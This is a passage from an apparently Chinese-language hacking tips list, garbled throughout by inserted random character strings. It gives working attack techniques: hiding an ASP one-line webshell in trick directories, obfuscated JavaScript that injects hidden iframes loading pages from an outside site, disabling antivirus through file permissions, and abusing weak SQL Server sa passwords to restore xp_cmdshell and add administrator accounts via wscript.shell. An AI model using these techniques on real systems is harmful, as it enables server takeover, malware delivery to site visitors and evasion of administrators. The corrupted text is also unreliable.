0 ]' z" H+ E/ |# Q. ~8 Z' Y9 Y用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。# ]5 Q) Q7 B: W3 N4 E6 t" v
9 L9 N u; B6 O$ R4 ^53、隐藏ASP后门的两种方法& {! N- q* U! S4 Q& o8 F3 f
1、建立非标准目录:mkdir images..\0 E; c m+ e6 f# k3 a6 F
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp; ^5 G! D8 n4 U, b
通过web访问ASP木马:http://ip/images../news.asp?action=login- [$ `$ U5 _- s6 Z% ^+ u
如何删除非标准目录:rmdir images..\ /s0 I. {( _2 k- r9 a h8 d8 v
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:( b: A# O1 T6 J: }( L8 s
mkdir programme.asp: ]1 b9 Q1 L) s% N, g% E+ F- X
新建1.txt文件内容:<!--#include file=”12.jpg”-->5 q* D# Y6 q8 p6 q' B' d
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件- n# H# P4 U" C- Y9 _! L
attrib +H +S programme.asp
$ u2 A- p4 T) F8 |0 @- Y+ a( X7 t通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
2 c% l/ q0 v h V. z2 X9 R: s, g/ J8 K( |" T
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。0 o2 |- X' k; E, t( W$ O
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。5 y' g9 o& g( Z- S5 S
1 g# B6 g9 S0 g) ~9 ]; Q, q- e8 \55、JS隐蔽挂马4 x# J$ b4 A: N' P
1.
/ l, K, K9 P7 f+ Svar tr4c3="<iframe src=ht";! e! v0 S. Z5 c
tr4c3 = tr4c3+"tp:/";
7 a% T: u, `2 N$ c6 |( Ptr4c3 = tr4c3+"/ww";! d$ ~1 w8 [2 S: ?' R+ L! d
tr4c3 = tr4c3+"w.tr4";
/ i! K5 \6 `% g1 A% e4 {* Ztr4c3 = tr4c3+"c3.com/inc/m";
' ~$ ~6 r7 y% mtr4c3 = tr4c3+"m.htm style="display:none"></i";
! a+ {: m( p( K& O/ g/ @- J' qtr4c3 =tr4c3+"frame>'";
# N9 @+ B8 Z [0 X7 u" adocument.write(tr4c3);+ \) f$ G( y3 W) o; ?# `1 K" k
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。, a, H3 t& G# [! p1 n9 ^
* ^6 S4 E+ C8 A
2. ?' K. L% s9 ], Y% ?- X3 p6 g
转换进制,然后用EVAL执行。如% Z. j: o+ ?9 x ]8 P% J
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");. e" F9 H: T q, U
不过这个有点显眼。1 a# P h6 w( S3 ^2 _
3.8 r. _/ R i) V! s4 ^/ Z
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');8 f- n% ^% y9 c% F* g" @- v& k
最后一点,别忘了把文件的时间也修改下。
7 G7 V: Z: J) C ^8 ~) e, f# J5 }* U$ F, H2 e9 [6 B$ h* b6 q
56.3389终端入侵常用DOS命令' R5 i3 j7 W" E/ R: ]9 n0 a$ m
taskkill taskkill /PID 1248 /t6 L/ F/ O/ o1 }1 M% F! K. N
" R/ `* X; D& @. E
tasklist 查进程
6 B$ ~4 Q5 T6 V4 @5 d+ Z \# r" m
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
' R2 P p; y- J: t6 F' y: Oiisreset /reboot9 d$ u/ N# x- R& E6 A
tsshutdn /reboot /delay:1 重起服务器: E* g6 b! n2 m, c3 s
; q. u0 C7 W8 n$ f$ ~
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
5 E3 e' a: {. ]+ Z8 a4 f
0 |& e3 I3 H1 E1 U$ ]9 [/ r$ j7 A0 jquery user 查看当前终端用户在线情况( }0 K- a* w, P- b# _+ j
; e& G4 |% C1 L4 m
要显示有关所有会话使用的进程的信息,请键入:query process *
) j* x" |9 N6 q# b; Z8 W
" Z! G$ o: U- l% g# X- }( u要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
' Z2 b" j& W# J6 b2 y7 w$ p0 ^4 m& b
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER20 Z4 k- c0 ~4 B+ X& R
6 b) r9 C( L, a+ c, R+ N要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02' u, [0 W9 a: l$ O. s3 k
! ^" D% x) _# j/ V/ N命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
; ]% K; a$ L3 A, t- s0 f7 j8 h. v1 ]! W6 Z
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
0 A8 v! @0 {/ r) H( ^9 M
: W: u0 w; L; ]' n5 m' Q- B命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
2 P' Z4 @( C' p% F i2 e6 w. H5 i" g& G
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机: Y! ~8 w: L6 u6 M/ E) a3 U
|9 h$ n# q4 t' Y7 E: ^
56、在地址栏或按Ctrl+O,输入:
: [1 E- A4 Z+ @; d2 l/ sjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;- d3 X) S; s. |3 R/ C
$ G C% p0 [* y4 l" q! c/ [ F源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
) G* D$ A: F5 x/ v$ |0 W* b! g# R" J# O( A
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
. w9 s! b9 m# G# V) e6 g用net localgroup administrators是可以看到管理组下,加了$的用户的。! u5 v `9 x& k* d+ i1 D2 T
3 O9 p* q8 w9 r: y2 v/ w6 w58、 sa弱口令相关命令) z' j, g1 Z j0 @
- E6 B3 u6 T- e+ c/ N一.更改sa口令方法:
' D: Y; Q) a; ]( D# M, u4 o3 W- W用sql综合利用工具连接后,执行命令:' u( r9 F( Y) } _' f
exec sp_password NULL,'20001001','sa'
$ h# m: a# B6 s9 v$ z(提示:慎用!)
1 Q2 Q3 K5 D' K. b- Z) Q6 J/ m# ?+ v1 x, W( S# L4 ~
二.简单修补sa弱口令.
& X% L* x6 K, v( L! p: J
8 f: p4 L( V( ]/ Q" z" r: p方法1:查询分离器连接后执行:
" O: U0 A8 V: b' Yif exists (select * from
* I2 H4 D1 G8 [* O* j6 ldbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and. y2 u0 a; O9 E# y5 t
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
- `* b" s0 P. _3 `2 u" m
4 G0 z0 K* O( L# U% A* Jexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
% K1 u5 M6 |( H
$ X: ]3 M5 r! V% t- y+ ~& pGO
" R J& N D, i) {
0 I6 _0 t& N5 t4 X/ K然后按F5键命令执行完毕
2 C7 p8 T: O* G4 n2 f9 R% J# S5 s" s, | M& l, d
方法2:查询分离器连接后
/ y" Q+ [3 L3 |# W: G5 g& S第一步执行:use master% U2 |; w. }5 k5 Z, J7 b5 L7 X
第二步执行:sp_dropextendedproc 'xp_cmdshell') n) g8 X8 I5 P6 Z
然后按F5键命令执行完毕. Y/ D ~5 V7 y/ m% q
0 x; R1 m+ P# u. B* i$ t3 o
) ]. ?1 ~3 S! g4 a7 ~三.常见情况恢复执行xp_cmdshell.: x; p: H; X3 G. d1 f' u2 A
6 `; S" A3 w" n0 k( G8 A
4 \- l- K8 x" c1 未能找到存储过程'master..xpcmdshell'.) n9 O8 c H5 C N( t
恢复方法:查询分离器连接后,
- i' r; Y5 v2 A, F1 Q5 V* B+ c第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int8 M; @0 O) c$ s" w( u6 c& ]
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'7 S2 d& O4 w' R8 n% I
然后按F5键命令执行完毕% K! R. \2 H% y5 |9 n9 m
+ I+ w3 s: W: ?1 P9 X9 a' A4 q: y
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)4 s; G9 v& V, `) w) ^7 s
恢复方法:查询分离器连接后,
z. j1 T$ a/ C第一步执行:sp_dropextendedproc "xp_cmdshell"' x" ]% M% ^0 r6 f3 _
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 {* T6 D& j1 {
然后按F5键命令执行完毕0 S) y+ f" V2 x4 E: Q+ h
- v, M, x; O: c L
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
: F: c% q. d& s# I4 X4 K恢复方法:查询分离器连接后,
7 K/ u2 B: c% o. y# t Y$ Q: Q第一步执行:exec sp_dropextendedproc 'xp_cmdshell'8 t- c7 r" W, c2 I
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 1 X! _7 s: m. d* X6 c( o4 t
然后按F5键命令执行完毕
# i) ]2 Q& w/ N4 V
- [! P2 \ M. i- }" Q& \7 @- _四.终极方法.
+ D4 ~6 }4 B+ c& l+ p如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
# j6 |1 ~4 c/ Y2 u; e9 A查询分离器连接后,
7 S1 P+ K% L6 @# u- a2000servser系统:
& R3 I' W" w3 N) e* \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'+ x' m. M B0 [7 R- U7 ]
2 n9 X) ]/ o! m0 c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'/ f- Q8 Y n. f4 k. Y _
: p3 g- I- H6 ~$ pxp或2003server系统:
3 R! g9 p N( B1 K2 s2 M5 o
5 n, Z& I" ^" ~declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'1 j1 \5 \$ c% ]3 a2 c/ b. m
% W; J; s0 W& R" b% {( x& g& G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
, u% e+ F7 e4 G: r& M* F9 Y& ^. g0 ~ |